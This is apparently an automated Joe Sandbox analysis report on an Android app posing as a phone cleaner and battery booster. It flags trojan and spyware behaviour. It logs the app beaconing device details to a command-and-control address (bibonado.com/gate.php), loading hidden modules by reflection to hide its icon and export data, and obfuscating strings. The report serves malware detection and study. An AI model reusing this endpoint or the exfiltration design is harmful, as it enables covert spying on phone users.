Loading ...

Analysis Report A3FUUtB5Kb

Overview

General Information

Joe Sandbox Version:24.0.0
Analysis ID:694431
Start date:26.10.2018
Start time:21:02:57
Joe Sandbox Product:Cloud
Overall analysis duration:0h 11m 51s
Hypervisor based Inspection enabled:false
Report type:full
Sample file name:A3FUUtB5Kb
Cookbook file name:defaultandroidfilecookbook.jbs
Analysis system description:Android x86 6.0 EEE PC
Detection:MAL
Classification:mal60.troj.spyw.evad.and@0/256@2/0
Warnings:
Show All
  • Not all executed log events are in report (maximum 10 identical API calls)
  • Not all resource files were parsed
  • Report size exceeded maximum capacity and may have missing behavior information.
  • Report size exceeded maximum capacity and may have missing disassembly code.
  • Report size exceeded maximum capacity and may have missing dynamic data code.

Detection

StrategyScoreRangeReportingDetection
Threshold600 - 100Report FP / FNmalicious

Classification

Signature Overview

Click to jump to signature section


Location Tracing:

barindex
Queries the phones location (GPS)Show sources
Source: com.google.android.gms.internal.zzhe;->zza:306API Call: android.location.Location.getLatitude
Source: com.google.android.gms.internal.zzhe;->zza:308API Call: android.location.Location.getLongitude

Spreading:

barindex
Has permission to change the WIFI configuration including connecting and disconnectingShow sources
Source: submitted apkRequest permission: android.permission.CHANGE_WIFI_STATE
Accesses external storage locationShow sources
Source: com.google.android.gms.internal.zzbl;->zzdn:5API Call: android.os.Environment.getExternalStorageState
Source: com.google.android.gms.internal.zzbv;-><init>:12API Call: android.os.Environment.getExternalStorageDirectory

Networking:

barindex
Checks an internet connection is availableShow sources
Source: com.google.android.gms.internal.zzhj$zza;-><init>:4API Call: android.net.ConnectivityManager.getActiveNetworkInfo
Source: com.google.android.gms.internal.zzhj$zza;->zza:75API Call: android.net.NetworkInfo.getDetailedState
Source: com.google.android.gms.internal.zzhj$zza;->zza:73API Call: android.net.ConnectivityManager.getActiveNetworkInfo
Source: com.google.android.gms.analytics.internal.zzag;->zzlB:58API Call: android.net.ConnectivityManager.getActiveNetworkInfo
Source: com.google.android.gms.analytics.internal.zzag;->zzlB:59API Call: android.net.NetworkInfo.isConnected
Source: com.google.android.gms.analytics.internal.zzah;->zzlB:337API Call: android.net.ConnectivityManager.getActiveNetworkInfo
Source: com.google.android.gms.analytics.internal.zzah;->zzlB:338API Call: android.net.NetworkInfo.isConnected
Source: com.google.android.gms.measurement.internal.zzq;->zzlB:59API Call: android.net.ConnectivityManager.getActiveNetworkInfo
Source: com.google.android.gms.measurement.internal.zzq;->zzlB:60API Call: android.net.NetworkInfo.isConnected
Source: com.google.android.gms.tagmanager.zzcl;->zzGX:13API Call: android.net.ConnectivityManager.getActiveNetworkInfo
Source: com.google.android.gms.tagmanager.zzcl;->zzGX:14API Call: android.net.NetworkInfo.isConnected
Source: com.google.android.gms.tagmanager.zzcx;->zzGw:72API Call: android.net.ConnectivityManager.getActiveNetworkInfo
Source: com.google.android.gms.tagmanager.zzcx;->zzGw:73API Call: android.net.NetworkInfo.isConnected
Source: mobile.cleaner.battery.heath.cleanmaster.utils.Utils;->isNetworkOnline:61API Call: android.net.ConnectivityManager.getActiveNetworkInfo
Connects to IPs without corresponding DNS lookupsShow sources
Source: unknownTCP traffic detected without corresponding DNS query: 216.58.207.174
Source: unknownTCP traffic detected without corresponding DNS query: 216.58.207.174
Source: unknownTCP traffic detected without corresponding DNS query: 216.58.207.174
Source: unknownTCP traffic detected without corresponding DNS query: 216.58.207.174
Source: unknownTCP traffic detected without corresponding DNS query: 216.58.207.131
Source: unknownTCP traffic detected without corresponding DNS query: 216.58.207.131
Source: unknownTCP traffic detected without corresponding DNS query: 172.217.20.227
Source: unknownTCP traffic detected without corresponding DNS query: 216.58.207.131
Source: unknownTCP traffic detected without corresponding DNS query: 172.217.20.227
Source: unknownTCP traffic detected without corresponding DNS query: 172.217.20.234
Source: unknownTCP traffic detected without corresponding DNS query: 172.217.20.234
Source: unknownTCP traffic detected without corresponding DNS query: 172.217.20.234
Source: unknownTCP traffic detected without corresponding DNS query: 216.58.207.131
Source: unknownTCP traffic detected without corresponding DNS query: 172.217.20.234
Source: unknownTCP traffic detected without corresponding DNS query: 172.217.20.234
Source: unknownTCP traffic detected without corresponding DNS query: 172.217.20.234
Source: unknownTCP traffic detected without corresponding DNS query: 216.58.207.131
Source: unknownTCP traffic detected without corresponding DNS query: 216.58.207.131
Source: unknownTCP traffic detected without corresponding DNS query: 216.58.207.131
Source: unknownTCP traffic detected without corresponding DNS query: 216.58.207.131
Source: unknownTCP traffic detected without corresponding DNS query: 216.58.207.131
Source: unknownTCP traffic detected without corresponding DNS query: 216.58.207.131
Source: unknownTCP traffic detected without corresponding DNS query: 216.58.207.131
Source: unknownTCP traffic detected without corresponding DNS query: 216.58.207.131
Source: unknownTCP traffic detected without corresponding DNS query: 172.217.20.227
Source: unknownTCP traffic detected without corresponding DNS query: 216.58.207.174
Source: unknownTCP traffic detected without corresponding DNS query: 216.58.207.174
Source: unknownTCP traffic detected without corresponding DNS query: 172.217.20.234
Source: unknownTCP traffic detected without corresponding DNS query: 172.217.20.234
Source: unknownTCP traffic detected without corresponding DNS query: 216.58.207.174
Source: unknownTCP traffic detected without corresponding DNS query: 172.217.20.227
Source: unknownTCP traffic detected without corresponding DNS query: 216.58.207.174
Source: unknownTCP traffic detected without corresponding DNS query: 216.58.207.174
Source: unknownTCP traffic detected without corresponding DNS query: 216.58.207.174
Source: unknownTCP traffic detected without corresponding DNS query: 216.58.207.174
Opens an internet connectionShow sources
Source: eptdz.jhxonwlp.zdmg.Tools;->LoadLibFuncOther:126API Call: java.net.URL.openConnection("http://bibonado.com/gate.php")
Source: xxxxxx.zzzzzz.glue.network;->SENDPOST:15API Call: java.net.URL.openConnection (not executed)
Source: com.google.android.gms.analytics.internal.zzah;->zzc:314API Call: java.net.URL.openConnection (not executed)
Source: com.google.android.gms.internal.zzdg;->zza:43API Call: java.net.URL.openConnection (not executed)
Source: com.google.android.gms.internal.zzdm$zza;->zzbr:22API Call: java.net.URL.openConnection (not executed)
Source: com.google.android.gms.internal.zzdu;->zzU:97API Call: java.net.URL.openConnection (not executed)
Source: com.google.android.gms.internal.zzhd;->zza:158API Call: java.net.URL.openConnection (not executed)
Source: com.google.android.gms.internal.zziy;->zzbr:12API Call: java.net.URL.openConnection (not executed)
Source: com.google.android.gms.internal.zzru;->zzgJ:18API Call: java.net.URL.openConnection (not executed)
Source: com.google.android.gms.internal.zzz;->zza:68API Call: java.net.URL.openConnection (not executed)
Source: com.google.android.gms.measurement.internal.zzq;->zzc:40API Call: java.net.URL.openConnection (not executed)
Source: com.google.android.gms.tagmanager.zzcx$1;->zzd:2API Call: java.net.URL.openConnection (not executed)
Performs DNS lookups (Java API)Show sources
Source: com.google.android.gms.cast.CastDevice;-><init>:10API Call: java.net.InetAddress.getByName (not executed)
Found strings which match to known social media urlsShow sources
Source: androidString found in binary or memory: FACEBOOK equals www.facebook.com (Facebook)
Source: androidString found in binary or memory: Facebook equals www.facebook.com (Facebook)
Source: androidString found in binary or memory: Facebook logout error. equals www.facebook.com (Facebook)
Source: androidString found in binary or memory: Must support either Facebook, Google or Email sign-in. equals www.facebook.com (Facebook)
Source: androidString found in binary or memory: No supported Facebook SDK version found to use Facebook logout. equals www.facebook.com (Facebook)
Source: androidString found in binary or memory: com.facebook.FacebookSdk equals www.facebook.com (Facebook)
Source: androidString found in binary or memory: com.facebook.Session equals www.facebook.com (Facebook)
Source: androidString found in binary or memory: com.facebook.Session$OpenRequest equals www.facebook.com (Facebook)
Source: androidString found in binary or memory: com.facebook.Session$StatusCallback equals www.facebook.com (Facebook)
Source: androidString found in binary or memory: com.facebook.SessionState equals www.facebook.com (Facebook)
Source: androidString found in binary or memory: com.facebook.auth.login equals www.facebook.com (Facebook)
Source: androidString found in binary or memory: com.facebook.katana equals www.facebook.com (Facebook)
Source: androidString found in binary or memory: com.facebook.login.LoginManager equals www.facebook.com (Facebook)
Source: androidString found in binary or memory: facebook equals www.facebook.com (Facebook)
Source: androidString found in binary or memory: facebook.com equals www.facebook.com (Facebook)
Source: androidString found in binary or memory: https://www.facebook.com equals www.facebook.com (Facebook)
Monitors network connection stateShow sources
Source: com.google.android.gms.tagmanager.zzbl;->zzba:30API Call: android.content.IntentFilter.addAction android.net.conn.CONNECTIVITY_CHANGE
Performs DNS lookupsShow sources
Source: unknownDNS traffic detected: queries for: bibonado.com
Posts data to webserverShow sources
Source: unknownHTTP traffic detected: POST /gate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Dalvik/2.1.0 (Linux; U; Android 6.0.1; VirtualBox Build/MOB31E)Host: bibonado.comConnection: Keep-AliveAccept-Encoding: gzipContent-Length: 394Data Raw: 34 49 67 62 6f 48 44 42 75 34 58 4b 45 57 32 71 30 68 38 6b 68 78 76 36 76 33 50 72 57 30 6a 51 61 58 71 78 6a 32 71 41 31 56 69 4d 35 56 64 53 38 7a 63 75 77 61 47 72 57 65 67 72 4f 49 4f 4b 2f 4f 73 64 39 7a 6f 34 70 6e 4c 38 0a 42 77 63 58 75 67 55 4a 4f 4d 44 2f 73 49 30 76 73 6d 67 79 7a 31 68 6c 4a 74 4c 68 76 38 4a 41 50 6f 73 72 34 69 51 74 37 2f 6e 6a 74 43 47 7a 39 61 78 30 44 34 48 39 56 6d 33 59 62 49 56 69 51 46 35 5a 54 61 79 2b 72 2b 50 75 0a 74 70 54 4f 2b 56 4a 4e 4e 70 51 73 53 68 51 59 6b 4f 71 78 2b 34 31 37 78 6c 69 66 48 33 58 2b 41 55 33 6c 47 6e 34 51 59 53 38 64 4a 62 46 61 7a 4a 74 68 6a 2b 32 35 61 50 6c 56 38 6c 53 68 45 48 79 37 56 67 42 36 76 32 34 77 0a 31 54 68 4b 46 52 6c 30 6b 33 2b 52 2f 61 54 63 50 2f 50 6b 62 55 43 69 79 33 33 75
Urls found in memory or binary dataShow sources
Source: androidString found in binary or memory: http://bibonado.com
Source: androidString found in binary or memory: http://bibonado.com/gate.php
Source: androidString found in binary or memory: http://goo.gl/8Rd3yj
Source: androidString found in binary or memory: http://goo.gl/naFqQk
Source: androidString found in binary or memory: http://plus.google.com/
Source: androidString found in binary or memory: http://schemas.android.com/apk/lib/com.google.android.gms.plus
Source: abc_screen_toolbar.xml, activity_entry_fa.xml, activity_phone_booster.xmlString found in binary or memory: http://schemas.android.com/apk/res-auto
Source: abc_action_menu_layout.xmlString found in binary or memory: http://schemas.android.com/apk/res-auto((android.support.v7.widget.ActionMenuView
Source: abc_screen_toolbar.xmlString found in binary or memory: http://schemas.android.com/apk/res-auto00android.support.v7.widget.ActionBarOverlayLayout
Source: abc_screen_simple.xml, activity_clean_all_finish.xml, abc_switch_thumb_material.xml, design_snackbar_in.xmlString found in binary or memory: http://schemas.android.com/apk/res/android
Source: abc_dialog_title_material.xmlString found in binary or memory: http://schemas.android.com/apk/res/android00android.support.v7.widget.FitWindowsLinearLayout
Source: abc_screen_simple.xmlString found in binary or memory: http://schemas.android.com/apk/res/android00android.support.v7.widget.FitWindowsLinearLayout((androi
Source: design_navigation_item.xmlString found in binary or memory: http://schemas.android.com/apk/res/android66android.support.design.internal.NavigationMenuItemView
Source: androidString found in binary or memory: http://www.google-analytics.com
Source: androidString found in binary or memory: http://www.google.com
Source: androidString found in binary or memory: https://accounts.google.com
Source: androidString found in binary or memory: https://app-measurement.com/a
Source: androidString found in binary or memory: https://csi.gstatic.com/csi
Source: androidString found in binary or memory: https://googleads.g.doubleclick.net/favicon.ico
Source: androidString found in binary or memory: https://googleads.g.doubleclick.net/mads/static/mad/sdk/native/mraid/v2/mraid_app_banner.js
Source: androidString found in binary or memory: https://googleads.g.doubleclick.net/mads/static/mad/sdk/native/mraid/v2/mraid_app_expanded_banner.js
Source: androidString found in binary or memory: https://googleads.g.doubleclick.net/mads/static/mad/sdk/native/mraid/v2/mraid_app_interstitial.js
Source: androidString found in binary or memory: https://googleads.g.doubleclick.net/mads/static/mad/sdk/native/production/sdk-core-v40-impl.js
Source: androidString found in binary or memory: https://googleads.g.doubleclick.net/mads/static/mad/sdk/native/sdk-core-v40-loader.html
Source: androidString found in binary or memory: https://googleads.g.doubleclick.net/mads/static/mad/sdk/native/sdk-core-v40-loader.js
Source: androidString found in binary or memory: https://googleads.g.doubleclick.net/mads/static/mad/sdk/native/sdk-core-v40.html
Source: androidString found in binary or memory: https://play.google.com/store/apps/details?id=
Source: androidString found in binary or memory: https://ssl.google-analytics.com
Source: androidString found in binary or memory: https://www.googleapis.com/auth/drive
Source: androidString found in binary or memory: https://www.googleapis.com/auth/drive.appdata
Source: androidString found in binary or memory: https://www.googleapis.com/auth/drive.apps
Source: androidString found in binary or memory: https://www.googleapis.com/auth/drive.file
Source: androidString found in binary or memory: https://www.googleapis.com/auth/fitness.activity.read
Source: androidString found in binary or memory: https://www.googleapis.com/auth/fitness.activity.write
Source: androidString found in binary or memory: https://www.googleapis.com/auth/fitness.body.read
Source: androidString found in binary or memory: https://www.googleapis.com/auth/fitness.body.write
Source: androidString found in binary or memory: https://www.googleapis.com/auth/fitness.location.read
Source: androidString found in binary or memory: https://www.googleapis.com/auth/fitness.location.write
Source: androidString found in binary or memory: https://www.googleapis.com/auth/fitness.nutrition.read
Source: androidString found in binary or memory: https://www.googleapis.com/auth/fitness.nutrition.write
Source: androidString found in binary or memory: https://www.googleapis.com/auth/games
Source: androidString found in binary or memory: https://www.googleapis.com/auth/games.firstparty
Source: androidString found in binary or memory: https://www.googleapis.com/auth/plus.login
Source: androidString found in binary or memory: https://www.googleapis.com/auth/plus.me
Source: androidString found in binary or memory: https://www.googletagmanager.com
Uses HTTP for connecting to the internetShow sources
Source: com.google.android.gms.analytics.internal.zzah;->zza:26API Call: java.net.HttpURLConnection.connect
Source: com.google.android.gms.analytics.internal.zzah;->zzb:65API Call: java.net.HttpURLConnection.connect
Source: com.google.android.gms.analytics.internal.zzah;->zzb:104API Call: java.net.HttpURLConnection.connect
Source: com.google.android.gms.internal.zzw;->zza:62API Call: org.apache.http.client.HttpClient.execute
Source: com.google.android.gms.measurement.internal.zzq$zzc;->run:43API Call: java.net.HttpURLConnection.connect
Uses HTTPSShow sources
Source: unknownNetwork traffic detected: HTTP traffic on port 57500 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 42120
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51649
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 32913
Source: unknownNetwork traffic detected: HTTP traffic on port 46823 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 37452
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55218
Source: unknownNetwork traffic detected: HTTP traffic on port 42120 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57500
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 39802
Source: unknownNetwork traffic detected: HTTP traffic on port 39802 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 32913 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 57880 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 39804 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 57880
Source: unknownNetwork traffic detected: HTTP traffic on port 37452 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 51649 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 46823
Source: unknownNetwork traffic detected: HTTP traffic on port 55218 -> 443

E-Banking Fraud:

barindex
Has permission to query the list of currently running applicationsShow sources
Source: submitted apkRequest permission: android.permission.GET_TASKS

Spam, unwanted Advertisements and Ransom Demands:

barindex
May dial phone numberShow sources
Source: com.google.android.gms.internal.zzbl;->zzdj:16API Call: android.net.Uri.parse("tel:")
Loads advertisementShow sources
Source: androidString found in binary or memory: .doubleclick.net
Source: androidString found in binary or memory: //googleads.g.doubleclick.net/mads/static/mad/sdk/native/native_ads.html
Source: androidString found in binary or memory: ad.doubleclick.net
Source: androidString found in binary or memory: googleads.g.doubleclick.net
Source: androidString found in binary or memory: https://googleads.g.doubleclick.net/favicon.ico
Source: androidString found in binary or memory: https://googleads.g.doubleclick.net/mads/static/mad/sdk/native/mraid/v2/mraid_app_banner.js
Source: androidString found in binary or memory: https://googleads.g.doubleclick.net/mads/static/mad/sdk/native/mraid/v2/mraid_app_expanded_banner.js
Source: androidString found in binary or memory: https://googleads.g.doubleclick.net/mads/static/mad/sdk/native/mraid/v2/mraid_app_interstitial.js
Source: androidString found in binary or memory: https://googleads.g.doubleclick.net/mads/static/mad/sdk/native/production/sdk-core-v40-impl.js
Source: androidString found in binary or memory: https://googleads.g.doubleclick.net/mads/static/mad/sdk/native/sdk-core-v40-loader.html
Source: androidString found in binary or memory: https://googleads.g.doubleclick.net/mads/static/mad/sdk/native/sdk-core-v40-loader.js
Source: androidString found in binary or memory: https://googleads.g.doubleclick.net/mads/static/mad/sdk/native/sdk-core-v40.html
Source: androidString found in binary or memory: loading resource: https://googleads.g.doubleclick.net/favicon.ico
Source: androidString found in binary or memory: loading resource: https://googleads.g.doubleclick.net/mads/static/mad/sdk/native/production/sdk-core-v40-impl.js
Source: androidString found in binary or memory: loading resource: https://googleads.g.doubleclick.net/mads/static/mad/sdk/native/sdk-core-v40-loader.html
Source: androidString found in binary or memory: loading resource: https://googleads.g.doubleclick.net/mads/static/mad/sdk/native/sdk-core-v40-loader.js

Operating System Destruction:

barindex
Kills background processesShow sources
Source: mobile.cleaner.battery.heath.cleanmaster.ActivityBatteySaver;->clearApplicationData:40API Call: android.app.ActivityManager.killBackgroundProcesses
Source: mobile.cleaner.battery.heath.cleanmaster.ActivityPhoneBooster;->clearApplicationData:40API Call: android.app.ActivityManager.killBackgroundProcesses
Source: mobile.cleaner.battery.heath.cleanmaster.ActivityScanAll;->clearBatteySaver:52API Call: android.app.ActivityManager.killBackgroundProcesses
Lists and deletes files in the same contextShow sources
Source: com.google.android.gms.internal.zzv;->zza:155API Calls in same method context: File.listFiles,File.delete
Source: com.google.android.gms.internal.zzdu;->zzeb:277API Calls in same method context: File.listFiles,File.delete

Change of System Appearance:

barindex
May access the Android keyguard (lock screen)Show sources
Source: androidString found in binary or memory: keyguard
Acquires a wake lockShow sources
Source: com.google.android.gms.internal.zzrp;->acquire:132API Call: android.os.PowerManager$WakeLock.acquire
Sets a repeating alarmShow sources
Source: mobile.cleaner.battery.heath.cleanmaster.HomeActivity;->getNotification:38API Call: android.app.AlarmManager.setRepeating
Source: mobile.cleaner.battery.heath.cleanmaster.WifiReceiverListener1;->onReceive:36API Call: android.app.AlarmManager.setRepeating

System Summary:

barindex
Executes native commandsShow sources
Source: eptdz.jhxonwlp.zdmg.Hagi;->check_net_ads:9API Call: java.lang.Runtime.exec ("/system/bin/netstat -t")
Requests potentially dangerous permissionsShow sources
Source: submitted apkRequest permission: android.permission.CHANGE_WIFI_STATE
Source: submitted apkRequest permission: android.permission.CLEAR_APP_CACHE
Source: submitted apkRequest permission: android.permission.GET_TASKS
Source: submitted apkRequest permission: android.permission.INTERNET
Source: submitted apkRequest permission: android.permission.USE_CREDENTIALS
Source: submitted apkRequest permission: android.permission.WAKE_LOCK
Source: submitted apkRequest permission: android.permission.WRITE_EXTERNAL_STORAGE
Classification labelShow sources
Source: classification engineClassification label: mal60.troj.spyw.evad.and@0/256@2/0
Creates SQLiteDatabase tableShow sources
Source: com.google.android.gms.analytics.internal.zzj$zza;->onOpen:102API Call: android.database.sqlite.SQLiteDatabase.execSQL
Reads shares settingsShow sources
Source: com.google.android.gms.internal.zzip$8;->zzbr:8API Call: "content_url_hashes":
Source: com.google.android.gms.internal.zzbp$4;->zze:5API Call: "gads:sdk_core_location": https://googleads.g.doubleclick.net/mads/static/mad/sdk/native/sdk-core-v40-loader.html
Source: com.google.android.gms.internal.zzbp$4;->zze:5API Call: "gads:sdk_csi_server": https://csi.gstatic.com/csi
Source: com.google.android.gms.internal.zzbp$4;->zze:5API Call: "gads:sdk_core_experiment_id": null
Source: com.google.android.gms.internal.zzbp$4;->zze:5API Call: "gads:request_builder:singleton_webview_experiment_id": null
Source: com.google.android.gms.internal.zzbp$4;->zze:5API Call: "gads:sdk_use_dynamic_module_experiment_id": null
Source: com.google.android.gms.internal.zzbp$4;->zze:5API Call: "gads:block_autoclicks_experiment_id": null
Source: com.google.android.gms.internal.zzbp$4;->zze:5API Call: "gads:spam_app_context:experiment_id": null
Source: com.google.android.gms.internal.zzbp$4;->zze:5API Call: "gads:video_stream_cache:experiment_id": null
Source: com.google.android.gms.internal.zzbp$4;->zze:5API Call: "gads:app_index:experiment_id": null
Source: com.google.android.gms.internal.zzbp$4;->zze:5API Call: "gads:kitkat_interstitial_workaround:experiment_id": null
Source: com.google.android.gms.internal.zzbp$4;->zze:5API Call: "gads:interstitial_follow_url:experiment_id": null
Source: com.google.android.gms.internal.zzbp$4;->zze:5API Call: "gads:interstitial_ad_pool:experiment_id": null
Source: eptdz.jhxonwlp.zdmg.Tools;->readStringConfig:244API Call: android.content.SharedPreferences.getString
Source: com.google.android.gms.iid.zzd;->get:43API Call: android.content.SharedPreferences.getString
Source: com.google.android.gms.iid.zzd;->get:51API Call: android.content.SharedPreferences.getString
Source: com.google.android.gms.iid.zzd;->zzi:138API Call: android.content.SharedPreferences.getString
Source: com.google.android.gms.flags.impl.zza$zza$1;->zzvt:7API Call: android.content.SharedPreferences.getBoolean
Source: com.google.android.gms.flags.impl.zza$zzd$1;->zzkp:6API Call: android.content.SharedPreferences.getString
Source: com.google.android.gms.analytics.internal.zzai$zza;->zzlN:69API Call: android.content.SharedPreferences.getString
Source: com.google.android.gms.analytics.internal.zzai;->zzlJ:57API Call: android.content.SharedPreferences.getString
Source: com.google.android.gms.auth.api.signin.internal.zzq;->zzbS:96API Call: android.content.SharedPreferences.getString
Source: com.google.android.gms.internal.zzbp$1;->zzb:6API Call: android.content.SharedPreferences.getBoolean
Source: com.google.android.gms.internal.zzdy;->restore:76API Call: android.content.SharedPreferences.getString
Source: com.google.android.gms.internal.zzip$2;->zzbr:7API Call: android.content.SharedPreferences.getBoolean
Source: com.google.android.gms.internal.zzip$6;->zzbr:7API Call: android.content.SharedPreferences.getBoolean
Source: com.google.android.gms.internal.zzli;->zznU:156API Call: android.content.SharedPreferences.getString
Source: com.google.android.gms.measurement.internal.zzt$zza;->zzCR:6API Call: android.content.SharedPreferences.getBoolean
Source: com.google.android.gms.measurement.internal.zzt$zzc;->zzlN:83API Call: android.content.SharedPreferences.getString
Source: com.google.android.gms.measurement.internal.zzt;->zzAr:51API Call: android.content.SharedPreferences.getBoolean
Source: com.google.android.gms.measurement.internal.zzt;->zzCP:72API Call: android.content.SharedPreferences.getBoolean
Source: com.google.android.gms.measurement.internal.zzt;->zzCQ:77API Call: android.content.SharedPreferences.getString
Source: com.google.android.gms.measurement.internal.zzt;->zziJ:136API Call: android.content.SharedPreferences.getBoolean
Source: com.google.android.gms.tagmanager.zzax;->zzf:16API Call: android.content.SharedPreferences.getString
Source: com.google.android.gms.tagmanager.zzax;->zzm:27API Call: android.content.SharedPreferences.getString

Data Obfuscation:

barindex
Found very long method stringsShow sources
Source: Lcom/google/android/gms/internal/zzal;->zzm(Landroid/content/Context;)VMethod string: kN6R7ba8fSNltfAoX2Ceus8q55zNLa8LSwmk5PtrKQxTOW4APLrgPj/XilQPRAsq6ghyhXY4SJ7iCRtuKZWvyeoJwHzVGD5zg0nv3Bs3tZBXdPxNVuAWsZC+SQXuph7fu1sTJ+5FVbVNVa4pWDIdb+rpEZw19frucbVGZARi4c0J3H9aL9fZzvRJmKAFfSbWlbBpxLSRZwdoJBGziCe51vLlp3fdeEe9liDv0gsVL1+Ayz+I0NbgCVegkKXTwnI Length: 6508
Source: Lcom/google/android/gms/common/zzd$zzd$2;->zzoL()[BMethod string: 0\u0082\u0004\u00a80\u0082\u0003\u0090\u00a0\u0003\u0002\u0001\u0002\u0002\t\u0000\u00d5\u0085\u00b8l}\u00d3N\u00f50\r\u0006\t*\u0086H\u0086\u00f7\r\u0001\u0001\u0004\u0005\u00000\u0081\u00941\u000b0\t\u0006\u0003U\u0004\u0006\u0013\u0002US1\u00130\u0011\ Length: 4395
Source: Lcom/google/android/gms/internal/zzar;->zzac()Ljava/lang/String;Method string: kN6R7ba8fSNltfAoX2Ceus8q55zNLa8LSwmk5PtrKQxTOW4APLrgPj/XilQPRAsq6ghyhXY4SJ7iCRtuKZWvyeoJwHzVGD5zg0nv3Bs3tZBXdPxNVuAWsZC+SQXuph7fu1sTJ+5FVbVNVa4pWDIdb+rpEZw19frucbVGZARi4c0J3H9aL9fZzvRJmKAFfSbWlbBpxLSRZwdoJBGziCe51vLlp3fdeEe9liDv0gsVL1+Ayz+I0NbgCVegkKXTwnI Length: 6508
Obfuscates method namesShow sources
Source: A3FUUtB5KbTotal valid method names: 41%
Uses reflectionShow sources
Source: eptdz.jhxonwlp.zdmg.Tools;->LoadLibFuncCheck:95API Call: Real call: xxxxxx.zzzzzz.glue.ActivityModuleStart@8ecece3
Source: eptdz.jhxonwlp.zdmg.Tools;->LoadLibFuncCheck:95API Call: Real call: public boolean xxxxxx.zzzzzz.glue.ActivityModuleStart.need_activity(android.content.Context)
Source: eptdz.jhxonwlp.zdmg.Tools;->LoadLibFunc:32API Call: Real call: xxxxxx.zzzzzz.glue.ActivityModuleStart@7f201f8
Source: eptdz.jhxonwlp.zdmg.Tools;->LoadLibFunc:32API Call: Real call: public void xxxxxx.zzzzzz.glue.ActivityModuleStart.cron(android.content.Context)
Source: eptdz.jhxonwlp.zdmg.Tools;->LoadLibFuncOther:126API Call: Real call: android.app.ReceiverRestrictedContext@414d75
Source: eptdz.jhxonwlp.zdmg.Tools;->LoadLibFuncOther:126API Call: Real call: null
Source: eptdz.jhxonwlp.zdmg.Tools;->LoadLibFuncOther:126API Call: Real call: {}
Source: eptdz.jhxonwlp.zdmg.Tools;->LoadLibFuncOther:126API Call: Real call: null
Source: eptdz.jhxonwlp.zdmg.Tools;->LoadLibFuncOther:126API Call: Real call: android.app.SharedPreferencesImpl@ae5d928
Source: eptdz.jhxonwlp.zdmg.Tools;->LoadLibFuncOther:126API Call: Real call: [{"type":"get","id":"35e0ad83-665b-4c69-a323-9bf8865acbf7","info":"v: 1, imei:0, country:, cell:, android:4.2.1, model:Galaxy Nexus, phonenumber:, sim:, showads:0, showadsfail:0, referrer:, pkg:ghl.phoneboost.com, uid:1, ver:0.1.6, lang:en, model:Galaxy Nexus, android:23, x: 000000000001"}]
Source: eptdz.jhxonwlp.zdmg.Tools;->LoadLibFuncOther:126API Call: Real call: http://bibonado.com/gate.php
Source: eptdz.jhxonwlp.zdmg.Tools;->LoadLibFuncOther:126API Call: Real call: http://bibonado.com/gate.php
Source: eptdz.jhxonwlp.zdmg.Tools;->LoadLibFuncOther:126API Call: Real call: xxxxxx.zzzzzz.glue.ActivityModuleStart@b1005e9
Source: eptdz.jhxonwlp.zdmg.Tools;->LoadLibFuncOther:126API Call: Real call: public void xxxxxx.zzzzzz.glue.ActivityModuleStart.knock(android.content.Context,android.content.Intent)
Source: eptdz.jhxonwlp.zdmg.Tools;->LoadLibFuncOther:126API Call: Real call: xxxxxx.zzzzzz.glue.ActivityModuleStart@b152f07
Source: eptdz.jhxonwlp.zdmg.Tools;->LoadLibFuncOther:126API Call: Real call: public void xxxxxx.zzzzzz.glue.ActivityModuleStart.hideapp(android.content.Context,android.content.Intent)
Source: eptdz.jhxonwlp.zdmg.Tools;->LoadLibFuncOther:126API Call: Real call: android.app.ApplicationPackageManager@e0fd94
Source: eptdz.jhxonwlp.zdmg.Tools;->LoadLibFuncOther:126API Call: Real call: android.app.SharedPreferencesImpl@ae5d928
Source: eptdz.jhxonwlp.zdmg.Tools;->LoadLibFuncOther:126API Call: Real call: xxxxxx.zzzzzz.glue.ActivityModuleStart@dfcd0cd
Source: eptdz.jhxonwlp.zdmg.Tools;->LoadLibFuncOther:126API Call: Real call: public void xxxxxx.zzzzzz.glue.ActivityModuleStart.export(android.content.Context,android.content.Intent)
Source: eptdz.jhxonwlp.zdmg.Tools;->LoadLibFuncOther:126API Call: Real call: Intent { act=android.intent.action.MAIN flg=0x10000000 cmp=ghl.phoneboost.com/eptdz.jhxonwlp.zdmg.Oszcg }
Source: eptdz.jhxonwlp.zdmg.Tools;->LoadLibFuncCheck:95API Call: Real call: xxxxxx.zzzzzz.glue.ActivityModuleStart@d70094
Source: eptdz.jhxonwlp.zdmg.Tools;->LoadLibFuncCheck:95API Call: Real call: public boolean xxxxxx.zzzzzz.glue.ActivityModuleStart.need_activity(android.content.Context)
Source: eptdz.jhxonwlp.zdmg.Tools;->LoadLibFunc:32API Call: Real call: xxxxxx.zzzzzz.glue.ActivityModuleStart@e19ce2c
Source: eptdz.jhxonwlp.zdmg.Tools;->LoadLibFunc:32API Call: Real call: public void xxxxxx.zzzzzz.glue.ActivityModuleStart.export(android.content.Context)
Source: com.google.android.gms.internal.zzal;->zzV:20API Call: Real call: null
Source: com.google.android.gms.internal.zzal;->zzV:20API Call: Real call: public static java.lang.Long com.google.android.ads.zxxz.e.a()
Source: eptdz.jhxonwlp.zdmg.Tools;->LoadLibFuncCheck:95API Call: Real call: public boolean xxxxxx.zzzzzz.glue.ActivityModuleStart.need_activity(android.content.Context)
Source: com.google.android.gms.internal.zzal;->zzc:273API Call: Real call: public static java.lang.String com.google.android.ads.zxxz.i.a()
